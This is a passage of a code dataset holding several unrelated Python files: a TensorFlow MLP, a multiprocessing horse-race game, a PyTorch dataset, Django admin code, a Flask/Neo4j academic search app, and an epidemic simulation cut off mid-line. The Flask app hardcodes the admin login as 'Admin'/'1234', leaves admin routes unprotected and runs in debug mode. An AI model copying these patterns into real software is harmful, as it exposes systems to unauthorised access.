%s\",e)\n","repo_name":"flipkart-incubator/Astra","sub_path":"modules/sendrequest.py","file_name":"sendrequest.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":2365,"dataset":"github-code","pt":"37"} +{"seq_id":"15334404998","text":"import math # used by the sigmoid lambda at the bottom of this file\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder, OneHotEncoder\n\n\n\nclass call_weight(keras.callbacks.Callback):\n '''\n This class is to help me track the weight of the last layer using a \n Keras callback\n '''\n # Define my own callback class so I can track the weights.\n def on_train_begin(self,logs = {}):\n self.weights = []\n def on_train_batch_end(self, batch, logs = {}):\n w = self.model.layers[2].get_weights()\n 
w_arr =[w[1][ 1]]\n w_arr.extend(list(w[0][:,1]))\n #self.weights.append(self.model.layers[2].get_weights())\n self.weights.append(w_arr)\n\nclass call_err(keras.callbacks.Callback):\n def on_train_begin(self, logs = {}):\n self.err_tr = []\n self.err_te = []\n \n def on_epoch_end(self,batch, logs = {}):\n pred_tr = self.model.predict(x_tr).argmax(axis = 1)\n pred_te = self.model.predict(x_te).argmax(axis = 1)\n err_tr, err_te = get_err(pred_tr, pred_te)\n self.err_tr.append(err_tr)\n self.err_te.append(err_te)\n \nclass call_loss(keras.callbacks.Callback):\n '''\n This class is to track losses.\n '''\n def on_train_begin(self, logs = {}):\n self.losses = []\n\n def on_train_batch_end(self, batch, logs = {}):\n # print(logs)\n self.losses.append(logs.get('loss'))\n \n# Build up the sequential model. \ndef MLP(hidden_layers, nodes):\n MLP = Sequential()\n for l in range(hidden_layers):\n MLP.add(Dense(nodes, activation = tf.nn.sigmoid, \n kernel_initializer = tf.initializers.RandomUniform ))\n MLP.add(Dense(10,activation = tf.nn.sigmoid, \n kernel_initializer = tf.initializers.RandomUniform ))\n return MLP\n\nMLP = MLP(2, 3)\n# Initialize the trackers.\nweight_tracker = call_weight()\nloss_tracker = call_loss()\nerr_tracker = call_err()\n\n# Compile and fit.\nMLP.compile(optimizer = keras.optimizers.SGD(learning_rate = 3), loss = 'mse', metrics = ['accuracy'])\n\nhistory = MLP.fit(x_tr,y_tr, epochs = 100, batch_size = 32,verbose = 2, callbacks = [weight_tracker, loss_tracker, err_tracker])\n\n\nf = lambda x: 1/(1+math.exp(-x))\nf(0)\nf(0.6441136)\nf(0.656)\nf(0.658)\nf(0.5)\nf(0.62)\n1.3*0.62*0.38*0.62","repo_name":"RyanYin04/MachineLearningPractice","sub_path":"Project_NN/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74599356906","text":"\"\"\"\n@author: audrey.nicolle & emma.begard\n\"\"\"\n# Nov 2021\n# Course Hippique (version élèves)\n# Version très basique, sans mutex sur l’écran, sans arbitre, sans annoncer le gagnant, ... ...\n# −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n# VT100 : Actions sur le curseur\n# Quelques codes d’échappement (tous ne sont pas utilisés)\nCLEARSCR=\"\\x1B[2J\\x1B[;H\" # Clear SCReen\nCLEAREOS = \"\\x1B[J\" # Clear End Of Screen\nCLEARELN = \"\\x1B[2K\" # Clear Entire LiNe\nCLEARCUP = \"\\x1B[1J\" # Clear Curseur UP\nGOTOYX = \"\\x1B[%.2d;%.2dH\" # (’H’ ou ’f’) : Goto at (y,x), voir le code\nDELAFCURSOR = \"\\x1B[K\" # effacer après la position du curseur\nCRLF = \"\\r\\n\" # Retour à la ligne\nCURSON = \"\\x1B[?25h\" # Curseur visible\nCURSOFF = \"\\x1B[?25l\" # Curseur invisible\n# VT100 : Actions sur les caractères affichables\nNORMAL = \"\\x1B[0m\" # Normal\nBOLD = \"\\x1B[1m\" # Gras\nUNDERLINE = \"\\x1B[4m\" # Souligné\n# VT100 : Couleurs : \"22\" pour normal intensity\nCL_BLACK=\"\\033[22;30m\" # Noir. NE PAS UTILISER. On verra rien !!\nCL_RED=\"\\033[22;31m\" # Rouge\nCL_GREEN=\"\\033[22;32m\" # Vert\nCL_BROWN = \"\\033[22;33m\" # Brun\nCL_BLUE=\"\\033[22;34m\" # Bleu\nCL_MAGENTA=\"\\033[22;35m\" # Magenta\nCL_CYAN=\"\\033[22;36m\" # Cyan\nCL_GRAY=\"\\033[22;37m\" # Gris\n# \"01\" pour quoi ? 
(bold ?)\nCL_DARKGRAY=\"\\033[01;30m\" # Gris foncé\nCL_LIGHTRED=\"\\033[01;31m\" # Rouge clair\nCL_LIGHTGREEN=\"\\033[01;32m\" # Vert clair\nCL_YELLOW=\"\\033[01;33m\" # Jaune\nCL_LIGHTBLU=\"\\033[01;34m\" # Bleu clair\nCL_LIGHTMAGENTA=\"\\033[01;35m\" # Magenta clair\nCL_LIGHTCYAN=\"\\033[01;36m\" # Cyan clair\nCL_WHITE=\"\\033[01;37m\" # Blanc\n#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n\n# Import-----------------------------------------------------------------\nimport multiprocessing as mp\nimport os, time, math, random, sys, ctypes\n# Une liste de couleurs à affecter aléatoirement aux chevaux\nlyst_colors=[CL_WHITE, CL_RED, CL_GREEN, CL_BROWN, CL_BLUE, CL_MAGENTA, CL_CYAN, CL_GRAY,\nCL_DARKGRAY, CL_LIGHTRED, CL_LIGHTGREEN, CL_LIGHTBLU, CL_YELLOW, CL_LIGHTMAGENTA, CL_LIGHTCYAN]\n\n#Fonctions --------------------------------------------------------------\n\ndef effacer_ecran() : print(CLEARSCR,end=\"\")\n\ndef erase_line_from_beg_to_curs() : print(\"\\033[1K\",end=\"\")\n\ndef curseur_invisible() : print(CURSOFF,end=\"\")\n\ndef curseur_visible() : print(CURSON,end=\"\")\n\ndef move_to(lig, col) : print(\"\\033[\" + str(lig) + \";\" + str(col) + \"f\",end=\"\")\n\ndef en_couleur(Coul) : print(Coul,end=\"\")\n\ndef en_rouge() : print(CL_RED,end=\"\") # Un exemple !\n\ndef liste(tab):\n \"\"\" Création de la liste pour le classement des chevaux\n Parameters:\n entrée : \n tab : position des chevaux dans l'ordre croissant\n \"\"\"\n chevaux_pos = [] \n for a in range(0, len(tab)):\n chevaux_pos.append([chr(ord(\"A\")+a), tab[a]])\n return chevaux_pos\n \ndef up_date(tab, liste):\n \"\"\" cette fonction met à jour la position des chevaux dans la liste qui contient le classement\n parametres : \n entrées:\n tab : liste des positions des chevaux dans l'ordre 
alphabétique\n liste : la liste du classement à mettre à jour\n \"\"\"\n # on met a jour les positions des chevaux\n for i in range(len(liste)) :\n # on cherche le nom du cheval a mettre a jour dans tab\n for l in range(len(tab)):\n # si le nom du cheval correspond on met sa position a jour\n if liste[i][0] == chr(ord(\"A\")+l):\n liste[i][1] = tab[l] # tab est indexé par ordre alphabétique : on lit tab[l], pas tab[i]\n \n return liste\n\ndef tri(lst) :\n \"\"\" cette fonction trie les chevaux dans l'ordre décroissant\n parametres :\n entrée :\n lst : la liste de listes [cheval, position] à trier\n \"\"\"\n for i in range(0, len(lst)):\n for l in range(i,len(lst)):\n if lst[i][1] < lst[l][1]:\n lst[i], lst[l] = lst[l], lst[i]\n return lst\n\ndef disp_scores(lst, pos):\n \"\"\" cette fonction affiche les scores\n Parametres :\n entrée :\n lst : liste du classement \n pos : la ligne d'affichage sur le terminal\n \"\"\"\n premier = 0\n deuxieme = 0\n troisieme = 0\n dernier = 0\n move_to(pos, 2)\n en_couleur(CL_WHITE)\n # pour eviter d'afficher des chevaux qui n'existent pas et causer des erreurs d'index dans la liste\n if len(lst) == 1:\n premier = lst[0][0]\n deuxieme = 'aucun'\n troisieme = 'aucun'\n\n elif len(lst) == 2:\n premier = lst[0][0]\n deuxieme = lst[1][0]\n troisieme = 'aucun'\n\n else :\n premier = lst[0][0]\n deuxieme = lst[1][0]\n troisieme = lst[2][0]\n\n print(\"Premier :{} , Deuxième:{}, Troisième:{}, Dernier : {}\".format(premier,deuxieme,troisieme, lst[len(lst)-1][0] ))\n\ndef arbitre(tab, fin, lettre, parie, Nb_process) : \n \"\"\" cette fonction affiche le classement et l'affichage du pari\n Parametres :\n entrées :\n tab : position des chevaux dans l'ordre alphabetique \n fin : la position de fin de course\n lettre : le cheval sur lequel le joueur a parié\n parie : un booléen qui indique si le joueur a parié ou pas\n Nb_process : nombre de chevaux+1 qui courent, pour gerer l'affichage dans arbitre\n \"\"\"\n # on crée la liste des chevaux avec leurs positions\n result = liste(tab)\n # tant que le dernier cheval n'est pas arrivé \n while result[-1][1] < fin-1 :\n # on met a jour la liste\n result = up_date(tab, result)\n # on trie la liste avec des colonnes decroissantes\n result = tri(result)\n # on affiche les resultats\n disp_scores(result, (Nb_process-1)*4+4)\n pari(result, lettre, parie, (Nb_process-1)*4+3)\n # si le joueur a parié\n if parie == True :\n move_to((Nb_process-1)*4+5,2)\n en_couleur(CL_WHITE)\n # le cheval a gagné\n if result[0][0] == lettre:\n print(\" Le cheval {} a gagné !!!! \".format(lettre))\n\n # le cheval du pari n'a pas gagné\n else :\n print(\" Le cheval {} n'a pas gagné \".format(lettre))\n\ndef saisie(Nb_process):\n \"\"\" cette fonction demande a l'utilisateur s'il veut parier et renvoie la réponse et le pari\n Param :\n sortie:\n val : le cheval choisi, ou 'N' si le joueur n'a pas voulu parier\n parie : true ou false si le joueur a voulu parier\n \"\"\"\n valeurs = ['A', 'B', 'C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n run = True \n parie = False\n parier = input('Parier sur un cheval ? : O / N \\n') \n # pour proteger la saisie\n if parier in ['O', 'N']:\n if parier =='O':\n parie = True\n # tant que l'on a pas renseigné une valeur correcte pour le pari\n while run :\n val = input('Entrer un cheval pour parier ! 
lettre majuscule A à {} \n'.format(valeurs[Nb_process-2])) \n if val in valeurs[:Nb_process-1] :\n return val, parie \n else :\n return 'N', parie \n # saisie invalide ('O'/'N' non respecté) : pas de pari\n return 'N', False\n\ndef forme(ma_ligne, col, anim):\n \"\"\" Cette fonction dessine le cheval\n Parametres :\n entrées : \n ma_ligne : le debut de l'affichage\n col : la colonne du début\n anim : int qui permet de choisir un modèle\n\n sortie : \n anim : la forme que le cheval prendra au prochain tour\n \"\"\"\n ligne = ma_ligne*3\n if anim == 0:\n # on fait la tête du cheval\n move_to(ligne+1,col+7) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n # on set la couleur\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\n # on fait le corps du cheval\n move_to(ligne+2,col) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/|-----|')\n # on fait les pattes du cheval\n move_to(ligne+3,col+1) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('| | | |')\n return 1\n elif anim == 1:\n # on fait la tête du cheval\n move_to(ligne+1,col+7) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n # on set la couleur\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\n # on fait le corps du cheval\n move_to(ligne+2,col) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/|-----|')\n # on fait les pattes du cheval\n move_to(ligne+3,col+1) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('\\ \\ \\ \\ ')\n return 2 \n else :\n # on fait la tête du cheval\n move_to(ligne+1,col+7) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n # on set la couleur\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\n # on fait le corps du cheval\n move_to(ligne+2,col) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/|-----|')\n # on fait les pattes du cheval\n move_to(ligne+3,col+1) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/ / / / ')\n return 1 \n\n# La tache d'un cheval\ndef un_cheval(ma_ligne : int, keep_running, cadna, tab) : # ma_ligne commence à 0\n col=1\n # booléen pour l'animation\n anim = 0\n while col < LONGEUR_COURSE and keep_running.value :\n # on demande un jeton \n cadna.acquire()\n \"\"\"move_to(ma_ligne+1,col) # pour effacer toute ma ligne\n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\"\"\"\n anim = forme(ma_ligne, col, anim)\n tab[ma_ligne] = col\n # on rend le jeton\n cadna.release()\n col+=1\n time.sleep(0.1*random.randint(1,5))\n \ndef pari(lst, lettre, parie, pos_afficher):\n \"\"\" cette fonction gere le pari : elle affiche le cheval sur lequel l'utilisateur a parié et sa position en temps réel\n Parameters:\n entrée : \n lst : liste avec les positions des chevaux dans l'ordre alphabetique\n lettre : la lettre du cheval sur lequel le joueur a parié\n parie : un booléen qui indique si le joueur a 
voulu parier\n pos_afficher : la ligne où afficher le pari\n \"\"\"\n # Si le joueur a dit vouloir parier\n if parie== True :\n # on recupere la position du cheval en temps réel\n pos = 0\n for valeur in lst :\n if valeur[0] == lettre :\n pos = lst.index(valeur)\n move_to(pos_afficher,2)\n en_couleur(CL_WHITE)\n # on affiche le nom du cheval et sa position dans la course\n print(\"Vous avez parié sur le Cheval {} ! Il est en position : {} \".format(lettre, pos+1))\n # le joueur n'as pas voulut parier\n else :\n move_to(pos_afficher,2)\n en_couleur(CL_WHITE)\n print(\" Pas de pari enregistré \")\n \n#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n\n# Main -----------------------------------------------------------------------------------------\ndef course_hippique(keep_running) :\n\n Nb_process=10+1\n lock = mp.Semaphore(1)\n mes_process = [0 for i in range(Nb_process) or i in range(Nb_process)]\n # la position des chevaux de chaque sous process\n tab = mp.Array('i', range(Nb_process-1) )\n # on entre une valeur pour parier\n val_pari, parie = saisie(Nb_process)\n\n\n effacer_ecran()\n curseur_invisible()\n\n\n for i in range(Nb_process): # Lancer Nb_process processus\n # si on est au dernier terme de la liste on a crée tt les chevaux, donc on lance l'arbitre\n if i == Nb_process-1:\n mes_process[i] = mp.Process(target=arbitre, args=(tab,LONGEUR_COURSE, val_pari, parie, Nb_process))\n mes_process[i].start()\n #on crée tt les chevaux\n else : \n mes_process[i] = mp.Process(target=un_cheval, args= (i,keep_running,lock,tab))\n mes_process[i].start()\n\n\n move_to( (Nb_process-1)*4+1, 10)\n en_couleur(CL_WHITE)\n print(\"C'est parti !!!! \")\n\n for i in range(Nb_process): \n mes_process[i].join()\n\n\n move_to((Nb_process-1)*4+6, 1)\n curseur_visible()\n print(\"Course finie\")\n\nif __name__ == \"__main__\" :\n LONGEUR_COURSE = 100# Tout le monde aura la même copie (donc no need to have a ’value’)\n keep_running=mp.Value(ctypes.c_bool, True)\n\n course_hippique(keep_running)","repo_name":"AudreyNicolleCPU/Multiprocessing","sub_path":"src/course_hippique.py","file_name":"course_hippique.py","file_ext":"py","file_size_in_byte":15166,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35378208317","text":"from torchvision import transforms\nfrom torch.utils.data import Dataset\n\nimport pandas as pd\nfrom PIL import Image\nfrom pathlib import Path\nimport json\n\n\nclass SportDataset(Dataset):\n def __init__(\n self,\n mode: str = \"train\",\n transform: transforms = transforms.Resize(size=224),\n ):\n super().__init__()\n self.mode = mode\n df = pd.read_csv(f\"data/raw/{self.mode}.csv\")\n\n if self.mode == \"train\":\n self.labels = df[\"label\"].to_list()\n with open(\"data/interim/label_to_id.json\", \"r\") as file:\n self.label_to_id = json.load(file)\n with open(\"data/interim/id_to_label.json\", \"r\") as file:\n self.id_to_label = json.load(file)\n\n self.image_ids = df[\"image_id\"].to_list()\n self.p = Path(f\"data/raw/{mode}\")\n self.transform = transform\n\n def __len__(self):\n return len(self.image_ids)\n\n def __getitem__(self, idx):\n image = Image.open(str(self.p.joinpath(self.image_ids[idx]))).convert(\n \"RGB\"\n )\n\n image = self.transform(image)\n if self.mode == \"train\":\n return image, self.label_to_id[self.labels[idx]]\n return 
image\n","repo_name":"IPPK93/MADE_CV","sub_path":"src/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22571107561","text":"from django.contrib import admin\n\nfrom users.models import CustomUser, Subscription\n\n\nclass CustomUserAdmin(admin.ModelAdmin):\n list_display = ('pk', 'username', 'email', 'first_name', 'last_name')\n search_fields = ('username', 'email')\n\n\nclass SubscriptionAdmin(admin.ModelAdmin):\n list_display = ('id', 'user', 'following')\n list_editable = ('user', 'following')\n\n\nadmin.site.register(CustomUser, CustomUserAdmin)\nadmin.site.register(Subscription, SubscriptionAdmin)\n","repo_name":"AndreyZyuzin/foodgram-project-react","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19837521554","text":"from flask import Flask,render_template,request,redirect,url_for,flash,session\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom datetime import datetime \nfrom DB import DB\nimport sys\n \ndef baglantikur():\n global uri,user,password,db_neo\n uri = \"neo4j+s://7255dd1c.databases.neo4j.io:7687\"\n user = \"neo4j\"\n password = \"\"\n db_neo = DB(uri, user, password)\n\ndef baglantisonlandir():\n db_neo.close()\n\n\napp= Flask(__name__)\n\n\n@app.route(\"/vis/\",methods=[\"GET\",\"POST\"])\ndef vis(name):\n \n baglantikur()\n every_result = []\n yayin_result = db_neo.find_Arastirmaci_wrote_yayin(name)\n for re in yayin_result:\n sonuc = re[\"YayinAdi\"]\n result = db_neo.find_Yayin_to_everything(sonuc)\n every_result =every_result+result\n \n \n unique_arastirmacilar = []\n for row in every_result:\n if len(unique_arastirmacilar)>0:\n val=0\n for ad in unique_arastirmacilar:\n if ad == row[\"ArastirmaciAdi\"]:\n val+=1\n if val==0:\n unique_arastirmacilar.append(row[\"ArastirmaciAdi\"])\n else :\n unique_arastirmacilar.append( row[\"ArastirmaciAdi\"])\n \n\n\n nodes = []\n id = 0\n for ad in unique_arastirmacilar:\n veri={\n \"id\":\"\",\n \"label\":\"\"\n }\n veri.update({\"id\":id,\"label\":ad})\n id+=1\n nodes.append(veri)\n\n\n unique_yayin= []\n for row in every_result:\n if len(unique_yayin)>0:\n val=0\n for yayin in unique_yayin:\n if yayin == row[\"YayinAdi\"]:\n val+=1\n if val==0:\n unique_yayin.append(row[\"YayinAdi\"])\n else :\n unique_yayin.append( row[\"YayinAdi\"])\n \n\n for yayin in unique_yayin:\n veri1={\n \"id\":\"\",\n \"label\":\"\"\n }\n veri1.update({\"id\":id,\"label\":yayin})\n id+=1\n nodes.append(veri1)\n\n\n unique_tur= []\n for row in every_result:\n if len(unique_tur)>0:\n val=0\n for tur in unique_tur:\n if tur == row[\"YayinYeri\"]:\n val+=1\n if val==0:\n unique_tur.append(row[\"YayinYeri\"])\n else :\n unique_tur.append( row[\"YayinYeri\"])\n \n\n for tur in unique_tur:\n veri2={\n \"id\":\"\",\n \"label\":\"\"\n }\n veri2.update({\"id\":id,\"label\":tur})\n id+=1\n nodes.append(veri2)\n \n\n\n connection=[]\n for row in every_result:\n \n if len(connection)>0:\n for one in nodes:\n for two in nodes:\n for tree in nodes:\n if one[\"label\"]==row[\"ArastirmaciAdi\"] and two[\"label\"]==row[\"YayinAdi\"]and tree[\"label\"]==row[\"YayinYeri\"]:\n key1=0\n for deger in connection:\n if deger[\"one\"]==one[\"id\"] and deger[\"two\"]==two[\"id\"]:\n key1=1\n con3={\n \"one\":\"\",\n \"two\":\"\"\n }\n 
con3.update({\"one\":one[\"id\"],\"two\":two[\"id\"]})\n if key1==0:\n connection.append(con3)\n\n\n key2=0\n for deger in connection:\n if deger[\"one\"]==two[\"id\"] and deger[\"two\"]==tree[\"id\"]:\n key2=1\n con4={\n \"one\":\"\",\n \"two\":\"\"\n }\n con4.update({\"one\":two[\"id\"],\"two\":tree[\"id\"]})\n if key2==0:\n connection.append(con4)\n else:\n \n for one in nodes:\n for two in nodes:\n for tree in nodes:\n if one[\"label\"]==row[\"ArastirmaciAdi\"] and two[\"label\"]==row[\"YayinAdi\"]and tree[\"label\"]==row[\"YayinYeri\"]:\n \n con1={\n \"one\":\"\",\n \"two\":\"\"\n }\n con1.update({\"one\":one[\"id\"],\"two\":two[\"id\"]})\n connection.append(con1)\n con2={\n \"one\":\"\",\n \"two\":\"\"\n }\n con2.update({\"one\":two[\"id\"],\"two\":tree[\"id\"]})\n connection.append(con2)\n\n baglantisonlandir()\n return render_template(\"vis.html\",data=nodes,connection=connection)\n\n@app.route(\"/\",methods=[\"GET\",\"POST\"])\ndef home():\n \n if request.method==\"POST\":\n \n sec=request.form.get(\"sec\")\n fname=request.form.get(\"fname\")\n veriler = []\n baglantikur()\n\n result = db_neo.search(sec, fname)\n baglantisonlandir()\n \n return render_template('home.html', veriler=result)\n return render_template(\"home.html\")\n\n@app.route(\"/adminhome\",methods=[\"GET\",\"POST\"])\ndef adminhome():\n if request.method==\"POST\":\n baglantikur()\n YayinYeri=db_neo.find_YayinYeri()\n YayinAdi=db_neo.find_YayinAdi()\n ArastirmaciAdi=db_neo.find_ArastirmaciAdi()\n return render_template('createBaglanti.html',YayinYeri=YayinYeri,YayinAdi=YayinAdi,ArastirmaciAdi=ArastirmaciAdi)\n baglantisonlandir()\n\n return render_template(\"adminhome.html\")\n\n@app.route(\"/admingiris\",methods=[\"GET\",\"POST\"])\ndef admingiris():\n if request.method==\"POST\":\n baglantikur()\n kullaniciAdi =request.form.get('kullaniciAdi')\n password=request.form.get('password')\n if kullaniciAdi==\"Admin\" and password==\"1234\":\n return redirect(url_for('adminhome'))\n baglantisonlandir() \n return render_template(\"admingiris.html\")\n\n@app.route(\"/createBaglanti\",methods=[\"GET\",\"POST\"])\ndef createBaglanti():\n new_YayinYeri = []\n new_YayinAdi = []\n new_YayinTuru = []\n new_ArastırmaciAdi = []\n baglantikur()\n\n YayinYeri=db_neo.find_YayinYeri()\n\n for yayinyeri in YayinYeri:\n if yayinyeri != None:\n yayinyeri = yayinyeri.replace(\" \",\"_\")\n new_YayinYeri.append(yayinyeri)\n\n YayinAdi=db_neo.find_YayinAdi()\n\n for yayinadi in YayinAdi:\n if yayinadi != None:\n yayinadi = yayinadi.replace(\" \",\"_\")\n new_YayinAdi.append(yayinadi)\n\n YayinTuru=db_neo.find_YayinTuru()\n\n for yayinturu in YayinTuru:\n if yayinturu != None:\n yayinturu = yayinturu.replace(\" \",\"_\")\n new_YayinTuru.append(yayinturu)\n \n\n ArastirmaciAdi=db_neo.find_ArastirmaciAdi()\n\n for arastirmaciadi in ArastirmaciAdi:\n if arastirmaciadi != None:\n arastirmaciadi = arastirmaciadi.replace(\" \",\"_\")\n new_ArastırmaciAdi.append(arastirmaciadi)\n\n baglantisonlandir()\n if request.method==\"POST\":\n YayinYeri=request.form.get(\"YayinYeri\")\n YayinAdi=request.form.get(\"YayinAdi\")\n YayinTuru=request.form.get(\"YayinTuru\")\n ArastirmaciAdi=request.form.get(\"ArastirmaciAdi\") \n ArastirmaciAdi=ArastirmaciAdi.replace(\"_\",\" \")\n YayinAdi=YayinAdi.replace(\"_\",\" \")\n YayinTuru=YayinTuru.replace(\"_\",\" \")\n YayinYeri=YayinYeri.replace(\"_\",\" \")\n\n \n baglantikur()\n if YayinYeri !='' and YayinAdi !='' and ArastirmaciAdi !='' :\n if db_neo.y_t_c_sorgu(YayinAdi, YayinYeri, YayinTuru):\n 
db_neo.create_yayin_to_tur_connection(YayinAdi,YayinYeri,YayinTuru)#yayinID --- turID\n \n if db_neo.a_y_c_sorgu(ArastirmaciAdi, YayinAdi):\n db_neo.create_arastirmacilar_to_yayin_connection(ArastirmaciAdi ,YayinAdi)#\n \n baglantisonlandir()\n\n return render_template(\"createBaglanti.html\",YayinTuru=new_YayinTuru,YayinYeri=new_YayinYeri,YayinAdi=new_YayinAdi,ArastirmaciAdi=new_ArastırmaciAdi)\n\n\n\n@app.route(\"/createTur\",methods=[\"GET\",\"POST\"])\ndef createTur():\n if request.method==\"POST\": \n YayinTuru=request.form.get(\"YayinTuru\")\n YayinYeri=request.form.get(\"YayinYeri\")\n baglantikur()\n if db_neo.tur_sorgu(YayinTuru, YayinYeri):\n db_neo.create_tur(YayinTuru,YayinYeri)\n baglantisonlandir()\n return redirect(url_for('adminhome'))\n return render_template(\"createTur.html\")\n\n\n@app.route(\"/createArastirmaci\",methods=[\"GET\",\"POST\"])\ndef createArastirmaci(): \n if request.method==\"POST\":\n ArastirmaciAdi=request.form.get(\"ArastirmaciAdi\")\n ArastirmaciSoyadi=request.form.get(\"ArastirmaciSoyadi\")\n baglantikur()\n if db_neo.arastirmaci_sorgu(ArastirmaciAdi, ArastirmaciSoyadi):\n db_neo.create_arastirmaci(ArastirmaciAdi, ArastirmaciSoyadi)\n baglantisonlandir()\n return redirect(url_for('adminhome'))\n return render_template(\"createArastirmaci.html\")\n\n\n@app.route(\"/createYayin\",methods=[\"GET\",\"POST\"])\ndef createYayin(): \n if request.method==\"POST\":\n YayinAdi=request.form.get(\"YayinAdi\")\n YayinYili=request.form.get(\"YayinYili\")\n baglantikur()\n if db_neo.yayin_sorgu(YayinAdi, YayinYili):\n db_neo.create_yayin(YayinAdi, YayinYili)\n baglantisonlandir()\n return redirect(url_for('adminhome'))\n return render_template(\"createYayin.html\")\n\n\nif __name__ ==\"__main__\":\n app.debug=True\n app.run()\n","repo_name":"oguzhankoc55/Academic-Search-System-yazlab_2.3","sub_path":"Yazlab_2.3/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71048535467","text":"from network import DiseaseNetwork \nfrom disease_node import DiseaseNode\nfrom sir_node import SIRNode\nfrom vars import VarGetter\nfrom seirs_node import SEIRSNode\nfrom seirs_de_node import SEIRSDENode\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nfrom scipy import signal, fft\n\ndef stochastic_distribution_test(trials = 1000):\n # Spoiler its just the binomial distribution\n total_num = 200\n prob_of_event = 0.1\n boxes = np.zeros(total_num)\n for _ in range(trials):\n boxes[np.random.binomial(total_num, prob_of_event)] += 1\n\n plt.plot(np.arange(total_num), boxes)\n plt.show()\n\ndef quarantine_v_travel_ban(trials=10, city_to_analyze='Chicago'):\n v=VarGetter()\n\n idxvals = []\n maxvals = []\n\n thresh_vals = np.around(np.linspace(.05, .4, 30), 2)\n quarantine_days_list = np.arange(0, 15)\n\n for quarantine_days in tqdm(quarantine_days_list, 'QDays Trials'):\n idxvals2 = []\n maxvals2 = []\n\n for threshold in thresh_vals:\n v.threshold = threshold \n v.dvars['quarantine_days'] = quarantine_days\n\n avg_I_data, _ = get_avg_data(trials, v)\n idxvals2.append(avg_I_data.idxmax(axis=1)[city_to_analyze])\n maxvals2.append(avg_I_data.max(axis=1)[city_to_analyze])\n\n idxvals.append(idxvals2)\n maxvals.append(maxvals2)\n\n idxdf = pd.DataFrame(idxvals, index=quarantine_days_list, columns=thresh_vals)\n maxdf = pd.DataFrame(maxvals, 
index=quarantine_days_list, columns=thresh_vals)\n\n _, ax = plt.subplots(1, 2)\n\n sns.heatmap(idxdf, ax=ax[0])\n ax[0].set_ylabel('Quarantine Days')\n ax[0].set_xlabel('Travel Ban Threhold (Fraction of Population)')\n ax[0].set_title('Time to Peak')\n\n sns.heatmap(maxdf, ax=ax[1])\n ax[1].set_ylabel('Quarantine Days')\n ax[1].set_xlabel('Travel Ban Threhold (Fraction of Population)')\n ax[1].set_title('Max Percent of Population Infected')\n\n plt.show()\n # plt.savefig('Ban vs Quarantine.png')\n \ndef beta_ttp(trials=10):\n v = VarGetter()\n\n betas, ttpfargo, ttpchicago, ttpcolumbus, ttpwichita = [], [], [], [], []\n\n for i in tqdm(np.linspace(0.1, 1, 20), 'Betas'):\n v.dvars['beta'] = i\n betas.append(i)\n\n avg_I_data, _ = get_avg_data(trials, v)\n\n ttpfargo.append(avg_I_data.idxmax(axis=1)['Fargo'])\n ttpchicago.append(avg_I_data.idxmax(axis=1)['Chicago'])\n ttpcolumbus.append(avg_I_data.idxmax(axis=1)['Columbus'])\n ttpwichita.append(avg_I_data.idxmax(axis=1)['Wichita'])\n\n plt.scatter(betas, ttpfargo, color='orange', label='Fargo')\n plt.scatter(betas, ttpchicago, color='blue', label='Chicago')\n plt.scatter(betas, ttpcolumbus, color='green', label='Columbus')\n plt.scatter(betas, ttpwichita, color='red', label='Wichita')\n plt.xlabel('Beta Values')\n plt.ylabel('Log of Time (Days)')\n plt.title(f'Beta Values vs Time to Peak for 